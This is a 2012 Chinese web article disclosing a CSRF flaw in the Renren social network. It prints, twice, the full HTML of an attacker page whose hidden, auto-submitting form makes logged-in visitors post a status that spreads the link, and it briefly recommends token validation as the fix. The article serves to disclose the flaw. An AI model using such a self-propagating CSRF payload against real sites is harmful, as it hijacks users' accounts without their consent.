人人網(wǎng)CSRF漏洞曝光及修復(fù)方案
發(fā)布時(shí)間:2012-05-17 10:30:10 作者:佚名
我要評(píng)論
CSRF(Cross-site request forgery跨站請(qǐng)求偽造,也被稱成為“one click attack”或者session riding,通??s寫(xiě)為CSRF或者XSRF,是一種對(duì)網(wǎng)站的惡意利用。盡管聽(tīng)起來(lái)像跨站腳本(XSS),但它與XSS非常不同,并且攻擊方式幾乎相左。XSS利用站點(diǎn)內(nèi)的信任用戶,而CSRF則通
腳本頁(yè)面http://bookman.sinaapp.com/doover.php,訪問(wèn)該頁(yè)面后會(huì)發(fā)送一條狀態(tài)“已經(jīng)結(jié)束了,這是我的自白,想明白原理的看我日志就好。http://bookman.sinaapp.com/doover.php”
詳細(xì)說(shuō)明:
看了下那個(gè)鏈接的源代碼,是通過(guò)人人逛街的接口提交的。
接口地址http://j.renren.com/publisher/status,只要POST一個(gè)參數(shù)content到接口即可。
這個(gè)頁(yè)面post的content內(nèi)容就是“已經(jīng)結(jié)束了,這是我的自白XXXX”。
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>愛(ài)你的說(shuō)</title>
</head>
<body>
<iframe name="destination" width="0" height="0"></iframe>
數(shù)字bookman愛(ài)你。歡迎訪問(wèn)“肖寒Bookman”的人人空間。
<div id="kokia" style="float:left;display:none;">
<form id="akiko" name="akiko" action="http://j.renren.com/publisher/status" method="POST" target="destination">
<input type="text" name="synsbcp" www.fzitv.net value="1"/>
<p>raw: <input type="text" name="content" value="已經(jīng)結(jié)束了,這是我的自白,想明白原理的看我日志就好。http://bookman.sinaapp.com/doover.php"/></p>
<input type="submit" value="Submit" />
</form>
</div>
<script>
document.akiko.submit();
</script>
</body>
</html>

修復(fù)方案:
人人比我懂的多。以前有次flash的類(lèi)似的,傳播是站內(nèi)信吧。
補(bǔ)漏洞很簡(jiǎn)單,加一個(gè)token驗(yàn)證即可。
低級(jí)錯(cuò)誤一枚,從網(wǎng)不行啊。
作者 leo108 AND 白熊一枚
詳細(xì)說(shuō)明:
看了下那個(gè)鏈接的源代碼,是通過(guò)人人逛街的接口提交的。
接口地址http://j.renren.com/publisher/status,只要POST一個(gè)參數(shù)content到接口即可。
這個(gè)頁(yè)面post的content內(nèi)容就是“已經(jīng)結(jié)束了,這是我的自白XXXX”。
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>愛(ài)你的說(shuō)</title>
</head>
<body>
<iframe name="destination" width="0" height="0"></iframe>
數(shù)字bookman愛(ài)你。歡迎訪問(wèn)“肖寒Bookman”的人人空間。
<div id="kokia" style="float:left;display:none;">
<form id="akiko" name="akiko" action="http://j.renren.com/publisher/status" method="POST" target="destination">
<input type="text" name="synsbcp" www.fzitv.net value="1"/>
<p>raw: <input type="text" name="content" value="已經(jīng)結(jié)束了,這是我的自白,想明白原理的看我日志就好。http://bookman.sinaapp.com/doover.php"/></p>
<input type="submit" value="Submit" />
</form>
</div>
<script>
document.akiko.submit();
</script>
</body>
</html>

修復(fù)方案:
人人比我懂的多。以前有次flash的類(lèi)似的,傳播是站內(nèi)信吧。
補(bǔ)漏洞很簡(jiǎn)單,加一個(gè)token驗(yàn)證即可。
低級(jí)錯(cuò)誤一枚,從網(wǎng)不行啊。
作者 leo108 AND 白熊一枚
相關(guān)文章

人人網(wǎng) iPhone版 V7.0.0 官方最新版
人人網(wǎng)是一款是基于人人網(wǎng)主體服務(wù)的免費(fèi)應(yīng)用軟件,專(zhuān)門(mén)為手機(jī)用戶設(shè)計(jì)。2013-11-26- 樂(lè)劃鎖屏app是一款oppo壁紙鎖屏軟件,主要為用戶提供了超多強(qiáng)大的智能鎖屏工具,界面很清爽,內(nèi)容豐富的壁紙資源,各種精致的鎖屏,以及可互動(dòng)的動(dòng)態(tài)壁紙2025-09-04
sololearn編程學(xué)習(xí)平臺(tái) v4.110.0 安卓版版
sololearn官方版是主打編程代碼學(xué)習(xí)相關(guān)功能的軟件,sololearn漢化版讓你可以更好完成最新的編程代碼學(xué)習(xí),專(zhuān)業(yè)的軟件庫(kù)給你帶來(lái)更好的幫助,輕松的解決學(xué)習(xí)需求,更好的提2025-11-27HSE365(安全教育平臺(tái)) v3.2.16 安卓版
HSE365在線教育平臺(tái)app是由北京艾普數(shù)智科技有限公司開(kāi)發(fā)的一款一站式數(shù)字化安全管理服務(wù)平臺(tái),app基于“互聯(lián)網(wǎng)+安全生產(chǎn)”的先進(jìn)思維和技術(shù),旨在實(shí)現(xiàn)“讓安全成為一種習(xí)2026-03-26- Wordpress寫(xiě)個(gè)人博客的朋友越來(lái)越多同時(shí)想把寫(xiě)的博客文章同步到其他的社交網(wǎng)站上,比如人人網(wǎng),接下來(lái)為大家介紹一招,感興趣的你可以參考下哈,或許可以幫助到你2013-03-11

人人網(wǎng)奧運(yùn)屏蔽 關(guān)鍵詞 可以屏蔽奧運(yùn)相關(guān)的關(guān)鍵詞 不喜歡奧運(yùn)的人有福
不喜歡奧運(yùn)的人可以用這個(gè)軟件2012-08-07
人人桌面經(jīng)典版客戶端是人人網(wǎng)推出的官方桌面版客戶端,是人人網(wǎng)的官方增強(qiáng)軟件。人人桌面經(jīng)典版是官方提供的,適合習(xí)慣使用舊版的網(wǎng)友2014-07-02手機(jī)版人人網(wǎng)防打擾模式如何開(kāi)啟
人人網(wǎng)簡(jiǎn)稱人人,它讓您更加方便的隨時(shí)隨地的與好友自由溝通。 在溝通的過(guò)程中,各位人人網(wǎng)友可千萬(wàn)別忘了作息時(shí)間哦,下面小編就教你開(kāi)啟打擾模式設(shè)置2014-08-02- 人人網(wǎng)是一款很好用的社交平臺(tái)軟件,我們?cè)谑褂萌巳藴贤奶鞎r(shí),如何屏蔽陌生人的消息呢?下面隨小編一起來(lái)看下人人屏蔽陌生人消息的具體操作吧。希望此篇教程能對(duì)大家有所2014-08-02
- 我們?cè)谑褂萌巳藴贤奶鞎r(shí),如何屏蔽陌生人的消息呢?這是目前很多的人喜歡問(wèn)的問(wèn)題,本文帶來(lái)了詳細(xì)的教程2014-08-04




